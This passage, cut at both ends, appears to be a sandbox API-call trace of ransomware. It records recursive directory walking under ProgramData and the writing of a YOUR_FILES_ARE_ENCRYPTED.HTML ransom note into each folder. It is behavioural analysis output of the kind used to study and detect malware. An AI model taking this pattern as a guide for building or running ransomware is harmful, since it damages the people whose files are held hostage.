ExistingCompletionPort=0x274, CompletionKey=0x6b47b0, NumberOfConcurrentThreads=0x0) returned 0x274 [0107.215] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x6b47b0, lpOverlapped=0x6b47b0) returned 1 [0107.219] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa9e7d76e, ftCreationTime.dwHighDateTime=0x1d112b0, ftLastAccessTime.dwLowDateTime=0xa9e7d76e, ftLastAccessTime.dwHighDateTime=0x1d112b0, ftLastWriteTime.dwLowDateTime=0xa9faeae8, ftLastWriteTime.dwHighDateTime=0x1d112b0, nFileSizeHigh=0x0, nFileSizeLow=0x5d3, dwReserved0=0x19e8c0, dwReserved1=0x7784abfa, cFileName="RunTime.xml", cAlternateFileName="")) returned 0 [0107.219] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.219] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 115 [0107.219] GetProcessHeap () returned 0x600000 [0107.219] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.219] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\Prov\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\prov\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.220] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.221] CloseHandle (hObject=0x314) returned 1 [0107.222] GetProcessHeap () returned 0x600000 [0107.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.222] GetProcessHeap () returned 0x600000 [0107.222] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.223] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x19ebd8, cFileName="Prov", cAlternateFileName="")) returned 0 [0107.223] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.223] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 110 [0107.223] GetProcessHeap () returned 0x600000 [0107.223] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.224] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.224] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.225] CloseHandle (hObject=0x308) returned 1 [0107.225] GetProcessHeap () returned 0x600000 [0107.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.225] GetProcessHeap () returned 0x600000 [0107.225] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.226] FindNextFileW (in: hFindFile=0x626778, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xbde4e9af, ftCreationTime.dwHighDateTime=0x1d700aa, ftLastAccessTime.dwLowDateTime=0xbde4e9af, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbde4e9af, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="{fc01e91f-914c-45af-9d7c-0b2e5fbedf62}", cAlternateFileName="{FC01E~1")) returned 0 [0107.226] FindClose (in: hFindFile=0x626778 | out: hFindFile=0x626778) returned 1 [0107.226] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 71 [0107.227] GetProcessHeap () returned 0x600000 [0107.227] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.227] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\provisioning\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.228] WriteFile (in: hFile=0x304, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.229] CloseHandle (hObject=0x304) returned 1 [0107.229] GetProcessHeap () returned 0x600000 [0107.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.229] GetProcessHeap () returned 0x600000 [0107.229] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.230] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="Search", cAlternateFileName="")) returned 1 [0107.230] StrStrIW (lpFirst="Search", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.230] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned 35 [0107.230] GetProcessHeap () returned 0x600000 [0107.230] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x6dd4e0 [0107.230] lstrcpyW (in: lpString1=0x6dd4e0, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search" [0107.230] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*" [0107.231] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\*", lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName=".", cAlternateFileName="")) returned 0x626cf8 [0107.231] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3840877a, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3840877a, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="..", cAlternateFileName="")) returned 1 [0107.231] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Data", cAlternateFileName="")) returned 1 [0107.231] StrStrIW (lpFirst="Data", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.231] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned 40 [0107.231] GetProcessHeap () returned 0x600000 [0107.231] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0107.232] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data" [0107.232] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*" [0107.232] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\*", lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x19ebd8, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0107.233] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x19ebd8, cFileName="..", cAlternateFileName="")) returned 1 [0107.233] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x19ebd8, cFileName="Applications", cAlternateFileName="APPLIC~1")) returned 1 [0107.233] StrStrIW (lpFirst="Applications", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.233] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned 53 [0107.233] GetProcessHeap () returned 0x600000 [0107.233] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.233] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications" [0107.233] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*" [0107.233] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626638 [0107.234] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0107.234] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="Windows", cAlternateFileName="")) returned 1 [0107.234] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3879c03d, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x63dc6bf9, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63dc6bf9, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="Windows", cAlternateFileName="")) returned 0 [0107.234] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0107.234] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 83 [0107.234] GetProcessHeap () returned 0x600000 [0107.234] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.234] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Applications\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\applications\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.235] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.235] CloseHandle (hObject=0x314) returned 1 [0107.236] GetProcessHeap () returned 0x600000 [0107.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.236] GetProcessHeap () returned 0x600000 [0107.236] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.237] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x19ebd8, cFileName="Temp", cAlternateFileName="")) returned 1 [0107.237] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.237] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned 45 [0107.237] GetProcessHeap () returned 0x600000 [0107.237] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0107.238] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp" [0107.238] lstrcatW (in: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*") returned="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*" [0107.238] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\*", lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6407587b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0107.238] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6407587b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 1 [0107.238] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e7ec | out: lpFindFileData=0x19e7ec*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6407587b, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6306da, dwReserved1=0x630688, cFileName="..", cAlternateFileName="")) returned 0 [0107.238] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0107.238] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 75 [0107.238] GetProcessHeap () returned 0x600000 [0107.238] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x315b018 [0107.238] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x314 [0107.239] WriteFile (in: hFile=0x314, lpBuffer=0x315b018*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19eab8, lpOverlapped=0x0 | out: lpBuffer=0x315b018*, lpNumberOfBytesWritten=0x19eab8*=0x3c00, lpOverlapped=0x0) returned 1 [0107.239] CloseHandle (hObject=0x314) returned 1 [0107.240] GetProcessHeap () returned 0x600000 [0107.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x315b018 | out: hHeap=0x600000) returned 1 [0107.240] GetProcessHeap () returned 0x600000 [0107.240] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0107.240] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19eb00 | out: lpFindFileData=0x19eb00*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3847afbf, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3847afbf, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3847afbf, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x628c48, dwReserved1=0x19ebd8, cFileName="Temp", cAlternateFileName="")) returned 0 [0107.240] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0107.241] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 70 [0107.241] GetProcessHeap () returned 0x600000 [0107.241] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.241] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\Data\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\data\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x308 [0107.241] WriteFile (in: hFile=0x308, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19edcc, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19edcc*=0x3c00, lpOverlapped=0x0) returned 1 [0107.242] CloseHandle (hObject=0x308) returned 1 [0107.242] GetProcessHeap () returned 0x600000 [0107.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.243] GetProcessHeap () returned 0x600000 [0107.243] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0107.244] FindNextFileW (in: hFindFile=0x626cf8, lpFindFileData=0x19ee14 | out: lpFindFileData=0x19ee14*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x3840877a, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3879c03d, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3879c03d, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x633802, dwReserved1=0x6337c8, cFileName="Data", cAlternateFileName="")) returned 0 [0107.244] FindClose (in: hFindFile=0x626cf8 | out: hFindFile=0x626cf8) returned 1 [0107.244] wnsprintfW (in: pszDest=0x6dd4e0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 65 [0107.244] GetProcessHeap () returned 0x600000 [0107.244] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6ee9d8 [0107.244] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Search\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\programdata\\microsoft\\search\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x304 [0107.246] WriteFile (in: hFile=0x304, lpBuffer=0x6ee9d8*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19f0e0, lpOverlapped=0x0 | out: lpBuffer=0x6ee9d8*, lpNumberOfBytesWritten=0x19f0e0*=0x3c00, lpOverlapped=0x0) returned 1 [0107.246] CloseHandle (hObject=0x304) returned 1 [0107.247] GetProcessHeap () returned 0x600000 [0107.247] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6ee9d8 | out: hHeap=0x600000) returned 1 [0107.247] GetProcessHeap () returned 0x600000 [0107.247] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6dd4e0 | out: hHeap=0x600000) returned 1 [0107.248] FindNextFileW (in: hFindFile=0x626bb8, lpFindFileData=0x19f128 | out: lpFindFileData=0x19f128*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd2c3a2, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xbca7cf5a, ftLastAccessTime.dwHighDateTime=0x1d700aa, ftLastWriteTime.dwLowDateTime=0xbca7cf5a, ftLastWriteTime.dwHighDateTime=0x1d700aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x620890, dwReserved1=0x19f200, cFileName="SmsRouter", cAlternateFileName="SMSROU~1")) returned 1 [0107.248] StrStrIW (lpFirst="SmsRouter", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0107.248] wnsprintfW (in: pszDest=0x671348, cchDest=32768, pszFmt="%ls\\%ls" | out: 